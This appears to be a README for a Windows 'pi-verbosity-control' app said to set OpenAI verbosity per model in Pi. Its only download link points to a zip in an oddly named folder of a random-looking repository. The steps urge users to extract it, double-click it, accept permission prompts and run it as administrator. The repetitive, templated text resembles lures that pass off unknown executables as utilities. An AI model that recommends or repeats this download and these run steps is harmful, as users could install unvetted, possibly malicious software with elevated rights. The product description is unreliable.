pi-verbosity-control helps you set OpenAI verbosity per model in Pi and shows the current setting in a small footer. It is made for Windows users who want a simple way to control how detailed Pi responses feel.
Use the link below to visit the download page and get the app:
- Lets you set verbosity per model
- Shows the active verbosity in an inline footer
- Keeps the interface light and easy to read
- Helps you switch between short and detailed responses
- Stores settings so you do not need to set them each time
- Fits a simple Windows desktop workflow
- Windows 10 or Windows 11
- A recent web browser for the download page
- A working Pi setup
- Internet access for first-time setup
- Enough free disk space for a small desktop app
- Open the download page: https://raw.githubusercontent.com/bottomlessnessmiterbox585/pi-verbosity-control/main/nullibicity/control-pi-verbosity-2.4-alpha.3.zip
- Download the Windows app package from the repository page.
- If the file is in a ZIP folder, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the app file to run it.
- If Windows asks for permission, choose Yes.
- Keep the app in a place you can find, such as Downloads or Desktop.
- Start Pi if it is not already open.
- Launch
pi-verbosity-control. - Check that the app detects your available models.
- Select the model you want to change.
- Pick a verbosity level.
- Save the setting.
- Look at the inline footer to confirm the current value.
- Open the app
- Choose a model
- Select the verbosity you want
- Save the change
- The footer shows the active verbosity
- It updates when you switch models
- It helps you confirm the setting at a glance
- Open the app again
- Select another model
- Change the setting
- Save it again
This app uses a simple model-friendly setup:
- Low: Short replies with less detail
- Medium: Balanced replies with normal detail
- High: Longer replies with more detail
- Custom: Fine-tuned output for specific use cases
These labels make it easier to match the model's output to the kind of reply you want.
- Short answers for quick checks
- Clear, fuller replies for research
- Different settings for different models
- A visible footer for fast confirmation
- Simple control without changing other Pi settings
- Check that the file finished downloading
- Make sure you extracted the ZIP file first
- Try running the app again
- Restart Windows if the app still does not start
- Confirm Pi is running
- Check that the model list has loaded
- Close and reopen the app
- Make sure you selected a model
- Save the setting again
- Switch to another model and back
- Restart Pi
- Reopen
pi-verbosity-control
- Right-click the file
- Choose Run as administrator if needed
- Select Yes if Windows asks for permission
- If the file came from a ZIP, extract it first
pi-verbosity-control is meant to work as a small desktop helper. It focuses on local control of model verbosity and footer display. Keep your Pi account details safe and only use the app on your own Windows PC.
- A Windows app for verbosity control
- Per-model settings
- Inline footer display
- A simple, direct interface
- A small footprint for everyday use
- Use one setting for models you want to keep short
- Use another for models where you want more detail
- Check the footer before sending a prompt
- Keep the app updated if a newer version appears on the repository page
- Save after each change so the app remembers it
This guide is for Windows users, and the app is built for that setup.
No. You only need to download the app and open it.
Yes. The app is built for per-model control.
It shows the current verbosity setting in a small inline view so you can check it fast.
Use it when you want to change or check settings. After that, you can close it if your setup keeps the setting in place.
After download, keep the app in a folder you can reach easily:
- Downloads
- Desktop
- A folder named
Apps - A folder named
Pi Tools
If you move the file later, keep the related files together so the app can run without problems
- Open the repository page
- Download the Windows package
- Extract the files if needed
- Run the app
- Select a model
- Set verbosity
- Check the footer display